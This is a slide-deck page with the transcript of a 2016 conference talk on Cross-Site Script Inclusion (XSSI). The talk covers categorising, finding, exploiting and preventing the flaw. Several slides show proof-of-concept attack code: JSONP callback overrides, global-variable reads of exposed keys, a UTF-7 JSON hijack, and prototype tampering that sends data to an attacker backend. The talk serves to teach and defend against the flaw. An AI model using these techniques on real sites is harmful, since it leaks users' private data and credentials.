Upgrade to Pro — share decks privately, control downloads, hide ads and more …

The Tale of a Fameless but Widespread Vulnerability

luh2
June 16, 2016
Technology
0
550

The Tale of a Fameless but Widespread Vulnerability

Two key components account for finding vulnerabilities of a certain class: awareness of the vulnerability and ease of finding the vulnerability. Cross-Site Script Inclusion (XSSI) vulnerabilities are not mentioned in the de facto standard for public attention - the OWASP Top 10. Additionally there is no public tool available to facilitate finding XSSI. The impact reaches from leaking personal information stored, circumvention of token-based protection to complete compromise of accounts. XSSI vulnerabilities are fairly wide spread and the lack of detection increases the risk of each XSSI. In this talk we are going to demonstrate how to find XSSI, exploit XSSI and also how to protect against XSSI. Watch the presentation of Security Fest: https://www.youtube.com/watch?v=5qA0CtS6cZ4. Link to Area41 Video (slightly different) will be posted as soon as the video is up.

luh2

June 16, 2016
Tweet

More Decks by luh2

See All by luh2
(Still) Exploiting TCP Timestamps
luh2
0
240

Other Decks in Technology

See All in Technology
ChatworkのSRE部って実は 半分くらいPlatform Engineering部かもしれない
saramune
0
150
KubeConにproposalを送りたい人へのアドバイス
sat
PRO
3
220
カオナビの利用実績をアウトカムへつなげる旅 / example-of-data-management-startup-in-kaonavi
kaonavi
0
130
DevOpsDays History and my DevOps story
kawaguti
PRO
9
2.4k
Cracking the KubeCon CfP
inductor
2
220
ワールドカフェI /チューターを改良する / World Café I and Improving the Tutors
ks91
PRO
0
110
現代CSSフレームワークの内部実装とその仕組み
poteboy
8
3.5k
Databricks における 『MLOps』
databricksjapan
2
160
コンパウンドスタートアップのためのスケーラブルでセキュアなInfrastructure as Codeパイプラインを考える / Scalable and Secure Infrastructure as Code Pipeline for a Compound Startup
yuyatakeyama
4
4.6k
Reducing Cross-Zone Egress at Spotify with Custom gRPC Load Balancing Recap
koh_naga
0
190
VS CodeでAWSを操作しよう
smt7174
7
1.6k
Tableau事例紹介 / Tableau Case Study of Eureka
kazuya_araki_tokyo
1
180

Featured

See All Featured
JavaScript: Past, Present, and Future - NDC Porto 2020
reverentgeek
40
4.4k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
14
1.5k
Docker and Python
trallard
34
2.7k
No one is an island. Learnings from fostering a developers community.
thoeni
16
2.1k
GraphQLの誤解/rethinking-graphql
sonatard
50
9.2k
A Tale of Four Properties
chriscoyier
151
22k
Scaling GitHub
holman
457
140k
Building Adaptive Systems
keathley
31
1.9k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
2
3.4k
YesSQL, Process and Tooling at Scale
rocio
164
13k
Web development in the modern age
philhawksworth
202
10k
Git: the NoSQL Database
bkeepers
PRO
422
63k

Transcript

  1. Once upon a time…

  2. … but all was not good Same Origin Policy

  3. BUT Scripts (and JSONP) don‘t fall under the same strict

    SOP and can be included cross-domain, which is why we have

  4. XSSI - The Tale of a Fameless but Widespread Vulnerability

    Veit Hailperin @fenceposterror

  5. Wait what? RESEARCH CONSULTING AUDITING

  6. NOOO! XSSHowmany? www.malicious.net include script from www.your- bank.com leak data

  7. What About Ambient Authority? ▸ Works just the same as

    with CSRF  ▸ Ambient Authority Information is sent cross-site ▸ Leaked Information get‘s more interesting…

  8. Example Example

  9. The Script

  10. The Code

  11. The Leak

  12. You Said Fameless?

  13. We observe that a third of the surveyed sites utilize

    dynamic JavaScript. […] more than 80% of the sites are susceptible to attacks via remote script inclusion. - The Unexpected Dangers of Dynamic JavaScript, S. Lekies et al. “

  14. 1. Categorizing XSSI XXX

  15. Categorizing XSSI Dynamic JavaScript Non-Script Static JavaScript requiring Authentication Static

    Script / JSONP* * If the JSONP requires parameters, these need to be guessable 1 4 2 3

  16. 2. Finding XSSI

  17. ▸ Read the Code ▸ Grep for ▹ Public Keys

    ▹ Social Security Numbers ▹ Credit Card Numbers Finding XSSI Category 1

  18. Finding XSSI Category 2 and 3 Re-Request the JavaScript file

    without authentication and check if response is script Does the answer differ from the original? Re-Request the JavaScript file check if answer differs again Script requires authentication No Yes No Script not dynamic Yes Yes No Script probably generally dynamic Dynamic JS based on authentication

  19. Finding XSSI Category 4 – Non-Script / Browser Issues These

    issues are related to browser security Server Response [{'friend':'luke','email': '+ACcAfQBdADsAYQBsAGUAcgB0 ACgAJw BNAGEAeQAgAHQAaABlACAAZgBv AHIAYwBlACAAYgBlACAAdw BpAHQAaAAgAHkAbwB1ACcAKQA7 AFsAewAnAGoAb wBiACcAOgAnAGQAbwBuAGU-'}] Which translates to [{'friend':'luke','email': ''}];alert(‘May the force be with you’);[{'job':'done'}] Malicious Website <html> <body> <script src="http://site.tld/json- utf7.json" type="text/javascript" charset="UTF-7"></script> </body> </html> http://www.thespanner.co.uk/2011/05/30/json-hijacking/

  20. 2. Exploiting XSSI

  21. var privateKey = "-----BEGIN RSA PRIVATE KEY-----\ MIIEowIBAAKCAQEAvq7kdxjZq4naHB8jNTMrFsi SKhmf8rpsRWO0iS5EK/c+evvT\ [redacted]

    9abcosxptnnP286cyq7whYysfe5HqODAwZJp5SG FPKqilWE1MBur\ -----END RSA PRIVATE KEY-----", keys = [ { name: 'Key No 1', apiKey: '0c8aab23-2ab5-46c5-a0f2-e52ecf7d6ea8', privateKey: privateKey }, { name: 'Key No 2', apiKey: '1e4b8312-f767-43eb-a16b-d44d3e471198', privateKey: privateKey } ]; <!DOCTYPE html> <html> <head> <title>Global Variables</title> <script src="some.js"></script> </head> <body> <script> alert(JSON.stringify(keys[0])); </script> </body> </html> some.js Case: Global Variable

  22. Response angular.callbacks.7({"status":STATUS,"body":{"demographic s":{"email":......}}}) <script> var angular = function () {

    return 1; }; angular.callbacks = function () { return 1; }; angular.callbacks.7 = function (leaked) { alert(JSON.stringify(leaked)); }; </script> <script src="https://site.tld/p?jsonp=angular.callbacks.7" type="text/javascript"></script> Case: Function Override

  23. Response angular.callbacks._7({"status":STATUS,"body":{"demographics": {"email":......}}}) <script> gimmethatdata = function (leaked) { alert(JSON.stringify(leaked));

    }; </script> <script src="https://site.tld/p?jsonp=gimmethatdata" type="text/javascript"> </script> Case: Provide Callback

  24. (function(){ var arr = ["secret1", "secret2", "secret3"]; // intents to

    slice out first entry var x = arr.slice(1); ... })(); Array.prototype.slice = function(){ // leaks ["secret1", "secret2", "secret3"] sendToAttackerBackend(this); }; Case: Prototype Tampering Note: Example taken from S. Lekies paper

  25. 3. Preventing XSSI

  26. Preventing XSSI ▸ No sensitive data in JavaScript files or

    JSONP cbs. ▸ Correct Content-Type ▸ X-Content-Type-Options: nosniff ▸ Anti-Cross-Site Request Forgery Token ▸ SameSite Cookie Attribute (draft!) ▸ Spread the word ▸ Report them

  27. Links, References, Interesting Reads… • http://jeremiahgrossman.blogspot.ch/2006/01/advanced-web-attack- techniques-using.html • http://incompleteness.me/blog/2007/03/05/json-is-not-as-safe-as- people-think-it-is/

    • http://www.thespanner.co.uk/2011/05/30/json-hijacking/ • http://phrack.org/issues/69/12.html • https://www.mbsd.jp/Whitepaper/xssi.pdf • https://www.usenix.org/system/files/conference/usenixsecurity15/sec15- paper-lekies.pdf • http://sebastian-lekies.de/leak/ • http://miladbr.blogspot.ch/2013/03/cross-site-script-inclusion.html • http://www.scip.ch/en/?labs.20160414

  28. ▸ Passive Scanner Module ▸ Filters for JSONP and Scripts

    ▸ It’s in your Burp Store ▸ Currently only implemented for cookie Released DetectDynamicJS Burp Extension to make your life easier in finding XSSI

  29. Thanks for listening! Questions? @fenceposterror [email protected]